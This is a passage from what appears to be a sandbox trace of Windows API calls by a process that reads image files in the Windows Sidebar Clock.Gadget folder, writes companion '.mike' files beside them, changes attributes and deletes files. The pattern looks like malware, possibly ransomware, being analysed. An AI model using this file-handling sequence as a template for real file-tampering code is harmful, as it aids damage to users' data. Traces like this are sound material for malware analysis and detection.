lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike", lpFilePart=0x0) returned 0x5b [0103.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0103.448] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_pressed.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f23580, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x6f23580, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x6f496e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x690)) returned 1 [0103.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0103.449] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png", lpFilePart=0x0) returned 0x56 [0103.449] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike", lpFilePart=0x0) returned 0x5b [0103.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.449] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_pressed.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x22e8d80 | out: lpFileInformation=0x22e8d80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f23580, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x6f23580, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x6f496e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x690)) returned 1 [0103.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.449] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png", lpFilePart=0x0) returned 0x56 [0103.449] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png", dwFileAttributes=0x80) returned 0 [0103.450] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png", lpFilePart=0x0) returned 0x56 [0103.450] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike", lpFilePart=0x0) returned 0x5b [0103.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0103.450] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_pressed.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f23580, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x6f23580, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x6f496e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x690)) returned 1 [0103.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0103.450] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png", lpFilePart=0x0) returned 0x56 [0103.450] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike", lpFilePart=0x0) returned 0x5b [0103.451] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_pressed.png.mike")) returned 1 [0103.451] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", lpFilePart=0x0) returned 0x53 [0103.451] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", lpFilePart=0x0) returned 0x53 [0103.452] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", lpFilePart=0x0) returned 0x53 [0103.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0103.452] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0103.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0103.453] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", lpFilePart=0x0) returned 0x53 [0103.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0103.454] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0103.454] GetFileType (hFile=0x288) returned 0x1 [0103.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0103.454] GetFileType (hFile=0x288) returned 0x1 [0103.454] CloseHandle (hObject=0x288) returned 1 [0103.454] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", lpFilePart=0x0) returned 0x53 [0103.454] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", lpFilePart=0x0) returned 0x53 [0103.454] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0103.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0103.454] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0103.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.454] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png"), fInfoLevelId=0x0, lpFileInformation=0x22eb6e4 | out: lpFileInformation=0x22eb6e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e09d0f, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82e09d0f, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b795bd, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x357)) returned 1 [0103.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.455] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", lpFilePart=0x0) returned 0x53 [0103.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.455] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png"), fInfoLevelId=0x0, lpFileInformation=0x22eba44 | out: lpFileInformation=0x22eba44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e09d0f, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82e09d0f, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b795bd, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x357)) returned 1 [0103.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.455] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", lpFilePart=0x0) returned 0x53 [0103.455] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", lpFilePart=0x0) returned 0x58 [0103.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0103.455] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0103.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0103.455] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", lpFilePart=0x0) returned 0x53 [0103.455] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", lpFilePart=0x0) returned 0x53 [0103.455] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", lpFilePart=0x0) returned 0x53 [0103.455] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", lpFilePart=0x0) returned 0x58 [0103.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0103.455] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0103.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0103.456] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", lpFilePart=0x0) returned 0x58 [0103.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.456] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0103.456] GetFileType (hFile=0x288) returned 0x1 [0103.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.456] GetFileType (hFile=0x288) returned 0x1 [0103.456] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0103.456] WriteFile (in: hFile=0x288, lpBuffer=0x22eca78*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22eca78*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.457] CloseHandle (hObject=0x288) returned 1 [0103.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0103.457] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png"), fInfoLevelId=0x0, lpFileInformation=0x22ec508 | out: lpFileInformation=0x22ec508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e09d0f, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82e09d0f, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b795bd, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x357)) returned 1 [0103.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0103.457] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", lpFilePart=0x0) returned 0x53 [0103.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0103.457] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0103.458] GetFileType (hFile=0x288) returned 0x1 [0103.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0103.458] GetFileType (hFile=0x288) returned 0x1 [0103.458] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0103.458] ReadFile (in: hFile=0x288, lpBuffer=0x22edbd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22edbd0*, lpNumberOfBytesRead=0x2af080*=0x357, lpOverlapped=0x0) returned 1 [0103.459] CloseHandle (hObject=0x288) returned 1 [0103.460] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", lpFilePart=0x0) returned 0x58 [0103.460] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.460] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0103.460] GetFileType (hFile=0x288) returned 0x1 [0103.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.460] GetFileType (hFile=0x288) returned 0x1 [0103.460] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0103.460] WriteFile (in: hFile=0x288, lpBuffer=0x22f1ed0*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22f1ed0*, lpNumberOfBytesWritten=0x2af074*=0x360, lpOverlapped=0x0) returned 1 [0103.460] CloseHandle (hObject=0x288) returned 1 [0103.460] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", lpFilePart=0x0) returned 0x58 [0103.460] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0103.460] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0103.461] GetFileType (hFile=0x288) returned 0x1 [0103.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0103.461] GetFileType (hFile=0x288) returned 0x1 [0103.462] WriteFile (in: hFile=0x288, lpBuffer=0x22f5128*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22f5128*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.462] CloseHandle (hObject=0x288) returned 1 [0103.462] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", lpFilePart=0x0) returned 0x53 [0103.462] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", lpFilePart=0x0) returned 0x58 [0103.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0103.462] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0103.462] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", lpFilePart=0x0) returned 0x58 [0103.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.463] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.463] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", dwFileAttributes=0x80) returned 0 [0103.464] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png", lpFilePart=0x0) returned 0x53 [0103.464] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", lpFilePart=0x0) returned 0x58 [0103.464] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0103.464] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0103.464] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike", lpFilePart=0x0) returned 0x58 [0103.464] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png.mike")) returned 1 [0103.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0103.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0103.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0103.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0103.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0103.468] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0103.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.469] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png.mike", lpFilePart=0x0) returned 0x5d [0103.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0103.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0103.469] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png", nBufferLength=0x105, lpBuffer=0x2aebf4, 